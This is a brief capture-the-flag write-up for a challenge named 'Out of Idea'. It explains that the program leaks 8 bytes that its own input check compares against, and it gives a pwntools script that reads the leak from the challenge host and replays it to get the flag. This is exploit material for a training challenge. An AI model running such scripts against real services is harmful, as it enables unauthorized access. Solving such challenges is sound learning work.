# Out of Idea  From decompiled result 1. we could see that in line 22, it give 8bytes of v11 to us. 2. Then in line, we can see that it use strcmp to compare the user input and the unsinged long v11, if passed the check, we will get the flag The solution is very simple. Just read the 8bytes from stdin and replay it. ```python from pwn import * TARGET = './out_of_idea' HOST = 'chal.ctf.polyufyp.com' PORT = 25003 context.arch = 'amd64' # i386/amd64 context.log_level = 'debug' context.terminal = ['tmux','splitw','-h'] elf = ELF(TARGET) if len(sys.argv) > 1 and sys.argv[1] == 'remote': p = remote(HOST, PORT) # libc = ELF('') else: p = process(TARGET) libc = elf.libc gdbscript = '''''' if len(sys.argv) > 1 and sys.argv[1] == 'gdb': gdb.attach(p, gdbscript=gdbscript) #--- helper functions s = lambda data :p.send(data) #in case that data is an int sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) r = lambda numb=4096 :p.recv(numb) ru = lambda delims, drop=True :p.recvuntil(delims, drop) # misc functions uu32 = lambda data :u32(data.ljust(4, b'\x00')) uu64 = lambda data :u64(data.ljust(8, b'\x00')) leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr)) #--- payload = b"" ru(b"Welcome to out of idea!\n") leak = r(8) num = uu64(leak) print(hex(num)) sl(str(num)) p.interactive() ```